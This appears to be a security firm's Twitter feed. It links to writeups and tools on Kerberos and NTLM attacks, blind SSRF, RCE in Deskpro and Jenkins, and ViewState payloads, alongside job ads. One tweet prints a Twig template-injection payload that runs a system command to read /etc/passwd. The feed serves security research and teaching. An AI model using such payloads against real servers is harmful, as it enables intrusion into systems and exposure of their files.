RedForce

The video about blind SSRF in Google Cloud for which @david_nechuta got $31k is out! Watch it to see how it's sometimes possible to exfiltrate data with blind SSRFs. You can also test your own skills with hands-on lab 😎 Enjoy! youtu.be/ashSoc59z1Y

Our team member @0x4148 just published the 2nd part of windows authentication attacks. This part covers Kerberos authentication process and technical analysis of widely used Kerberos attacks. blog.redforce.io/windows-authen… Happy reading

We've just published the 1st part of the Windows authentication attacks series. blog.redforce.io/windows-authen… The series suppose to cover the NTLM/Kerberos authentication in detail as well as how their attacks work. Happy reading, and stay tuned for part 2.

@attritionorg Always a pleasure 😁

@RedForceSec ah in the news, I was looking for a security / advisory page. thanks!

We have updated the article with another "UNPATCHED" vector to achieve RCE. Thanks @Zombiehelp54 for the heads up. #RCE-Update" target="_blank" rel="nofollow noopener">blog.redforce.io/attacking-help…

Twig 3 SSTI RCE {{['cat${IFS}/etc/passwd']|filter('system')}} twitter.com/Black2Fan/stat…

@attritionorg You can find the advisory in there release notes under the following URL (support.deskpro.com/en/news/posts/…)

@RedForceSec "and last (and only) security advisory on their current website was in 2015" Is that behind the portal that requires registration? If not, could you link to that please? Not seeing it on their site.

@bad_packets @AboodNour Always a pleasure. If you need further information, please don't hesitate to reach out

Attacking Helpdesks (Part 1): Remote Code Execution (#RCE) chain on #Deskpro with #Bitdefender as a case study. Full technical details to #exploit RCE inside. blog.redforce.io/attacking-help… #BugBounty #websecurity #infosecwriteup

This will have huge impact!, another great example on how RCE can be achieved on OWA easily through ViewState deserialization attack. Red Teamers it's your chance now :) thezdi.com/blog/2020/2/24…

We are hiring, Sales Executive check the link for more details wuzzuf.net/jobs/p/263324-…

We are hiring, Sales Executive check the link for more details wuzzuf.net/jobs/p/263321-…

We are hiring, Back-end Developer check the link for more details wuzzuf.net/jobs/p/263320-…

We are hiring, Front-end Developer check the link for more details wuzzuf.net/jobs/p/263316-…

We are Hiring, check the link for more details wuzzuf.net/jobs/careers/R…

Jenkins pentesting notes and scripts github.com/gquere/pwn_jen…

"There is no pre-auth RCE in Jenkins since May 2017, but this is the one!" Relase a more reliable and elegant exploit - "awesome-jenkins-rce-2019" from my #HITB2019AMS talk. Thanks @0ang3el and @webpentest join this party! github.com/orangetw/aweso…

Just released viewgen, a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files. All algorithms supported. TL;DR: Got a web.config file or LFI on ASP.NET? Pop a shell! github.com/0xACB/viewgen

Kerberoasting revealed. The 1st part of Microsoft Kerberos implementation attacks series by our team member @Hatemsec . blog.redforce.io/oh-my-kerberos… Happy reading. #PenTest #redteam

Apache Local Root: CVE-2019-0211: Vulnerability description. Exploit will come later. cfreal.github.io/carpe-diem-cve…